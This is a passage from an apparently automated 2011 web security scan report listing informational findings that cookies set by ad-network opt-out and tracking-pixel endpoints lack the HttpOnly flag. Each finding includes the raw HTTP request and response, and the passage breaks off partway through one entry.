HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:35:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Sat, 04-Sep-2010 11:35:57 GMT; path=/; domain=.decdna.net
Set-Cookie: name=deleted; expires=Sat, 04-Sep-2010 11:35:57 GMT; path=/; domain=.decdna.net
Set-Cookie: %2edecdna%2enet/%2f/1/o=0/cookie; expires=Sat, 31-Aug-2024 11:35:58 GMT; path=/; domain=.decdna.net
Location: /optout/nai/index.php?action=optout&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


16.142. http://optout.mookie1.decideinteractive.com/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.decideinteractive.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.decideinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:32:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Sat, 04-Sep-2010 11:32:01 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: name=deleted; expires=Sat, 04-Sep-2010 11:32:01 GMT; path=/; domain=.decideinteractive.com
Set-Cookie: %2edecideinteractive%2ecom/%2f/1/o=0/cookie; expires=Sat, 31-Aug-2024 11:32:02 GMT; path=/; domain=.decideinteractive.com
Location: /optout/nai/index.php?action=optout&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


16.143. http://optout.mookie1.pm14.com/optout/nai/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mookie1.pm14.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.mookie1.pm14.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:36:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Sat, 04-Sep-2010 11:36:38 GMT; path=/; domain=.pm14.com
Set-Cookie: name=deleted; expires=Sat, 04-Sep-2010 11:36:38 GMT; path=/; domain=.pm14.com
Set-Cookie: %2epm14%2ecom/%2f/1/o=0/cookie; expires=Sat, 31-Aug-2024 11:36:39 GMT; path=/; domain=.pm14.com
Location: /optout/nai/index.php?action=optout&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


16.144. http://optout.mxptint.net/naioptout.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.mxptint.net
Path:   /naioptout.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /naioptout.ashx?nocache=0.322724 HTTP/1.1
Host: optout.mxptint.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:16:02 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
P3P: CP="NON CUR ADM DEVo PSAo PSDo OUR IND UNI COM NAV DEM STA PRE"
Location: /naicheck.ashx
Set-Cookie: mxpim=optout; domain=mxptint.net; expires=Mon, 04-Sep-2017 11:16:02 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 133

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fnaicheck.ashx">here</a>.</h2>
</body></html>

16.145. http://optout.xgraph.net/optout.gif.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optout.xgraph.net
Path:   /optout.gif.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout.gif.jsp?nocache=0.2092745 HTTP/1.1
Host: optout.xgraph.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _xgcid=3F312168868D0F0C318BF91F941ECF59; _xguid=F3DF262AFC62974063D1C62CA47B86ED

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: image/gif
Date: Sun, 04 Sep 2011 11:17:38 GMT
Location: http://optout.xgraph.net/optout.gif.jsp?check=1
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"
Server: nginx/1.0.4
Set-Cookie: XG_OPT_OUT=OPTOUT; Domain=.xgraph.net; Expires=Sun, 28-Aug-2039 11:17:38 GMT; Path=/
Content-Length: 0
Connection: keep-alive


16.146. http://p.brilig.com/contact/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/optout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact/optout?nocache=0.2626812 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BriligContact=5d4ee69c-99de-419c-8ef9-9d7e686b3586

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:13:23 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: BriligContact=OPT_OUT; Domain=.brilig.com; Expires=Tue, 27-Aug-2041 11:13:23 GMT
Set-Cookie: bbid=""; Domain=.brilig.com
Set-Cookie: bbid=""; Domain=p.brilig.com
Set-Cookie: BriligContact=OPT_OUT; Domain=p.brilig.com
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 11:13:23 GMT
Location: http://p.brilig.com/contact/isoptout?type=optout
X-Brilig-D: D=430
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


16.147. http://pbid.pro-market.net/engine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /engine

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /engine?optout=$nai_optout$&nocache=0.6619356 HTTP/1.1
Host: pbid.pro-market.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app4.ny
Set-Cookie: anProfile=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anHistory=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anCSC=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anCnv=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anSt=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTRD=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTHS=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: anTD4=x; Domain=.pro-market.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: optout=0+0+0; Domain=.pro-market.net; Expires=Tue, 27-Aug-2041 10:59:25 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Mon, 1 Jan 1990 0:0:0 GMT
Location: http://pbid.pro-market.net/engine?optout=$nai_verify$
Content-Type: text/html
Content-Length: 0
Date: Sun, 04 Sep 2011 10:59:25 GMT
Connection: close


16.148. http://phoenix.untd.com/TRCK/RGST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phoenix.untd.com
Path:   /TRCK/RGST

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TRCK/RGST?AGMT=214&TIME=720&RNS=2870ff57-7f1a-4f6a-b212-f02cd41820f6 HTTP/1.1
Host: phoenix.untd.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: WHRE=18E65_1:125D81_0_19135|125DC3_0_19094

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:59:20 GMT
nnCoection: close
Server: Phoenix/1.5.1
Content-Type: image/gif
Content-Length: 43
Set-Cookie: WHRE=18FC3_1:125D81_0_19293|125DC3_0_19094; expires=Wed, 01 Sep 2021 03:59:20 GMT; domain=.untd.com; path=/
P3P: policyref="http://cyclops.prod.untd.com/common/w3c/netzero.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa OUR BUS IND PHY ONL UNI FIN COM NAV INT DEM PRE LOC"
Pragma: no-cache
Expires: Tue, 25 Apr 1995 09:30:27 -0700

GIF89a.............!.......,...........D..;

16.149. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?tt=js&pid=114&cgn=14613&seg=14790&random=0.8588666620198637 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D9035684957%3As1%3D1314814522615%3Ats%3D1314964089478%3As2.33%3D%2C6940%2C

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:41 GMT
Server: 33XG08
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=u%3D9035684957%3As1%3D1314814522615%3Ats%3D1314964089478%3As2.33%3D%2C6940%2C; Domain=.33across.com; Expires=Mon, 03-Sep-2012 02:25:41 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: application/x-javascript
Content-Length: 298
Connection: close

(function(){try{if(!document.images){return;}var i,o,u=["http://ib.adnxs.com/mapuid?t=2&member=1001&user=9035684957&seg=166323&seg_code=33x&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Ft%3D2%26id%
...[SNIP]...

16.150. http://pixel.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.adblade.com
Path:   /imps.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imps.php?sgms=193 HTTP/1.1
Host: pixel.adblade.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: __sgs=Rkolm3H%2BdppOL6or2ytWhDZQNOeacHCu83vup2uIZ6Qwqy05SeMbjt01BACbO1t0xR6RxCZpl5RAOKhmEmgi8g%3D%3D; __esgs=UYx2FlkZNhD43QIFMYf0HRvSn3KklYp8Vni99f2%2BJtY%3D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: W3matter LLC | RevSense | http://www.w3matter.com
Set-Cookie: __sgs=C16GOfXVgnwIuGmLLu%2BZSQVJ55mp1tvSq34RVy%2BkrKMwqy05SeMbjt01BACbO1t0xR6RxCZpl5RAOKhmEmgi8g%3D%3D; expires=Mon, 03-Sep-2012 03:59:08 GMT; path=/; domain=.adblade.com
Content-type: image/gif;
Date: Sun, 04 Sep 2011 03:59:08 GMT
Server: lighttpd/1.4.21
Content-Length: 43

GIF89a.............!.......,...........D..;

16.151. http://pixel.fetchback.com/serve/fb/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/optout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/optout?nocache=0.4589903 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315103291_34024:68324:1:0:0_34021:68285:1:6006:6006_34024:68283:2:6240:6332_34024:68292:2:125128:125210_34023:68293:1:125841:125841; kwd=1_1315103291; scg=1_1315103291; ppd=1_1315103291; act=1_1315103291; uid=1_1315103598_1314893682667:5756480826433243; eng=1_1315103598_34024:0

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:23:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: apd=1_1315135391; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1315135391; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cmp=1_1315135391_16771:241709; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clk=1_1315135391; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1315135391_34024:68324:1:32100:32100_34021:68285:1:38106:38106_34024:68283:2:38340:38432_34024:68292:2:157228:157310_34023:68293:1:157941:157941; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315135391; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uat=1_1315135391; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1315135391_3984:241709:241709; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315135391_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: opt=; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 11:23:11 GMT; Path=/
Set-Cookie: ppd=1_1315135391; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: eng=1_1315135391_34024:31793; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315135391; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1315135391; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 11:23:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://pixel.fetchback.com/serve/fb/optoutverification
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 0


16.152. http://pixel.quantserve.com/optout_set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /optout_set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout_set?s=nai&nocache=0.6965706 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4e5e6725-891ad-f8693-5137e; d=EG8BIgHQB4FQCa0Wu-EYIIvxC6pQ

Response

HTTP/1.1 302 Found
Connection: close
Set-Cookie: qoo=OPT_OUT; expires=Wed, 01-Sep-2021 11:15:12 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Location: /optout_verify?s=nai&nocache=0.6965706
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sun, 04 Sep 2011 11:15:12 GMT
Server: QS


16.153. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=7249&nid=2146&put=n4tx19dbice3prpg7887b1ymgzfc6iit&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; nus_2046=0.00; ses2=5032^2&9346^1; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^2&9346^1&5271^1; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C; put_2211=4612741554684080402

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:07:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264894%3D1%267249%3D1; expires=Tue, 04-Oct-2011 03:07:11 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%5D%5D%3E%3E%264894%3D14658%2C0%2C304%2C%2C%267249%3D14659%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 03:07:11 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; expires=Tue, 04-Oct-2011 03:07:11 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

16.154. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F&expires=10 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=4642/5271
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; nus_2046=0.00; ses2=5032^2&9346^1; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4642/5271; rdk15=0; ses15=5032^2&9346^1&5271^1; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; expires=Tue, 04-Oct-2011 02:25:47 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C2%2C2%2C%2C; expires=Tue, 04-Oct-2011 02:25:47 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; expires=Wed, 14-Sep-2011 02:25:47 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

16.155. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4894&nid=1986&put=6422714091563403120&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=4642/5271
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
